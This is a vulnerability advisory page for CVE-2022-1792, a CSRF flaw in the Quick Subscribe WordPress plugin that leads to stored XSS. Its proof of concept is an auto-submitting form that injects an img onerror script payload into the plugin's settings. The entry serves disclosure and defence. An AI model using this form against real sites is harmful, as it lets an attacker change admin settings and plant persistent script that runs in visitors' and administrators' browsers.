Quick Subscribe <= 1.7.1 – Arbitrary Settings Update via CSRF to Stored XSS | CVE 2022-1792 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and leading to Stored XSS due to the lack of sanitisation and escaping in some of them

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=quicksubscribe.php" method="POST">
    <input type="text" name="button_qs" value="1">
    <input type="text" name="label_qs" value='"><img src=x onerror=alert(/XSS/)>ok'>
    <input type="text" name="tks_qs" value="Thanks for subscribing">
    <input type="text" name="submit_qs" value="Update Settings »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

quick-subscribe

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

44555c79-480d-4b6a-9fda-988183c06909

Timeline

Publicly Published

2022-05-23 (about 3 years ago)

Added

2022-05-23 (about 3 years ago)

Last Updated

2023-02-16 (about 2 years ago)

Other

Published

Title

Published

2025-04-16

Title

Conditional Shipping for WooCommerce < 3.4.1 - Cross-Site Request Forgery

Published

2022-04-28

Title

Footer Text <= 2.0.3 - Stored Cross-Site Scripting via CSRF

Published

2023-12-27

Title

WooCommerce PDF Invoice Builder < 1.2.102 - Cross-Site Request Forgery

Published

2025-08-25

Title

Google XML News Sitemap plugin <= 0.02 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2014-08-01

Title

SexyBookmarks - Setting Manipulation CSRF